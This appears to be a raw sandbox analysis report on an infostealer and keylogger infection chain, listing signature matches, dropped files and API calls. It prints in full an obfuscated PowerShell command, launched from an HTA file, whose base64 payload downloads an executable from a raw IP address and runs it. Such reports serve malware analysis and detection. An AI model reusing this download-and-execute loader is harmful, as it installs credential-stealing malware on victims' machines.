Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.vcc.exe.212605a8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000001.1464557928.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000002.3809626790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\vcc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exe			Jump to dropped file

Source: C:\Users\user\Links\daphpvwO.pif

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0289421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	6_2_0289421C
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893380 NtWriteVirtualMemory,	6_2_02893380
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893034 NtAllocateVirtualMemory,	6_2_02893034
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02899654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	6_2_02899654
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02899738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	6_2_02899738
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028995CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	6_2_028995CC
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893B44 NtUnmapViewOfSection,	6_2_02893B44
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028938D4 NtReadVirtualMemory,	6_2_028938D4
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0289421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	6_2_0289421A
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893032 NtAllocateVirtualMemory,	6_2_02893032
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02899578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	6_2_02899578

Source: C:\Users\user\AppData\Roaming\vcc.exe

Code function: 6_2_0289A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

6_2_0289A634

Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028820B4	6_2_028820B4
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0040DC11	11_2_0040DC11
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00407C3F	11_2_00407C3F
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00418CCC	11_2_00418CCC
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00406CA0	11_2_00406CA0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_004028B0	11_2_004028B0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0041A4BE	11_2_0041A4BE
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00418244	11_2_00418244
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00401650	11_2_00401650
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00402F20	11_2_00402F20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_004193C4	11_2_004193C4
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00418788	11_2_00418788
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00402F89	11_2_00402F89
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00402B90	11_2_00402B90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_004073A0	11_2_004073A0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_28F91448	11_2_28F91448
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_28F91438	11_2_28F91438
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_28F911A8	11_2_28F911A8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_28F91198	11_2_28F91198
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C033F08	11_2_2C033F08
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03B7E0	11_2_2C03B7E0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03B110	11_2_2C03B110
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C036BF0	11_2_2C036BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03EDA1	11_2_2C03EDA1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03EDB0	11_2_2C03EDB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03F64F	11_2_2C03F64F
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03F660	11_2_2C03F660
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C033EF8	11_2_2C033EF8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C031F29	11_2_2C031F29
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03A759	11_2_2C03A759
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03A768	11_2_2C03A768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03B106	11_2_2C03B106
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03E948	11_2_2C03E948
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03E958	11_2_2C03E958
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03F1FA	11_2_2C03F1FA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03F208	11_2_2C03F208
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03FAA8	11_2_2C03FAA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C03FAB8	11_2_2C03FAB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2C036BE0	11_2_2C036BE0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB54E0	11_2_2CBB54E0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBBD80	11_2_2CBBBD80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB06A0	11_2_2CBB06A0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB3048	11_2_2CBB3048
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB0040	11_2_2CBB0040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB62BA	11_2_2CBB62BA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB4D0	11_2_2CBBB4D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB4C1	11_2_2CBBB4C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBAC20	11_2_2CBBAC20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBAC10	11_2_2CBBAC10
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD470	11_2_2CBBD470
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD461	11_2_2CBBD461
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB8DB8	11_2_2CBB8DB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB8DA8	11_2_2CBB8DA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB0592	11_2_2CBB0592
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBE5D0	11_2_2CBBE5D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBE5C1	11_2_2CBBE5C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBDD20	11_2_2CBBDD20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBDD11	11_2_2CBBDD11
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBBD70	11_2_2CBBBD70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBEE80	11_2_2CBBEE80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1EE8	11_2_2CBB1EE8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1ED8	11_2_2CBB1ED8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1638	11_2_2CBB1638
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1627	11_2_2CBB1627
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBEE70	11_2_2CBBEE70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9668	11_2_2CBB9668
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB965A	11_2_2CBB965A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBA7B9	11_2_2CBBA7B9
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2798	11_2_2CBB2798
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2788	11_2_2CBB2788
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB87D8	11_2_2CBB87D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBA7C8	11_2_2CBBA7C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9F18	11_2_2CBB9F18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9F09	11_2_2CBB9F09
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBC768	11_2_2CBBC768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBC757	11_2_2CBBC757
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD8BA	11_2_2CBBD8BA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD8C8	11_2_2CBBD8C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD018	11_2_2CBBD018
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBD009	11_2_2CBBD009
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB0006	11_2_2CBB0006
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB078	11_2_2CBBB078
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB068	11_2_2CBBB068
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBC1D8	11_2_2CBBC1D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBC1C8	11_2_2CBBC1C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB928	11_2_2CBBB928
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBB918	11_2_2CBBB918
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBE178	11_2_2CBBE178
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBE168	11_2_2CBBE168
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB8960	11_2_2CBB8960
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9AB0	11_2_2CBB9AB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1A90	11_2_2CBB1A90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB1A80	11_2_2CBB1A80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9AC0	11_2_2CBB9AC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBEA28	11_2_2CBBEA28
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBEA18	11_2_2CBBEA18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9210	11_2_2CBB9210
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB9200	11_2_2CBB9200
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBCBB0	11_2_2CBBCBB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2BF0	11_2_2CBB2BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2BE0	11_2_2CBB2BE0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBCBC0	11_2_2CBBCBC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2331	11_2_2CBB2331
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBA370	11_2_2CBBA370
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBBA360	11_2_2CBBA360
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CBB2340	11_2_2CBB2340
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC42EB8	11_2_2CC42EB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC42850	11_2_2CC42850
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC40B30	11_2_2CC40B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC44040	11_2_2CC44040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC421E8	11_2_2CC421E8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC41B80	11_2_2CC41B80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC49334	11_2_2CC49334
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC4AC72	11_2_2CC4AC72
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC42EA8	11_2_2CC42EA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC42840	11_2_2CC42840
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC48818	11_2_2CC48818
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC48828	11_2_2CC48828
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC40B20	11_2_2CC40B20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC40040	11_2_2CC40040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC40006	11_2_2CC40006
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC44030	11_2_2CC44030
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC421D8	11_2_2CC421D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC41B71	11_2_2CC41B71
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC43540	11_2_2CC43540
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC43550	11_2_2CC43550
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC492ED	11_2_2CC492ED
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2CC492AB	11_2_2CC492AB
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2D5FB3C8	11_2_2D5FB3C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2D5F5D28	11_2_2D5F5D28
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2D5FC6B8	11_2_2D5FC6B8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_2D5F03CF	11_2_2D5F03CF

Source: Joe Sandbox View

Dropped File: C:\Users\user\Links\daphpvwO.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: String function: 0288457C appears 835 times
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: String function: 0288421C appears 65 times
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: String function: 02893E20 appears 54 times
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: String function: 02884414 appears 246 times
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: String function: 02893E9C appears 45 times
Source: C:\Users\user\Links\daphpvwO.pif	Code function: String function: 0040E1D8 appears 44 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Links\daphpvwO.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03

Source: C:\Users\user\AppData\Roaming\vcc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\niceworkingskilldevelopedwithgreatnews.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP"
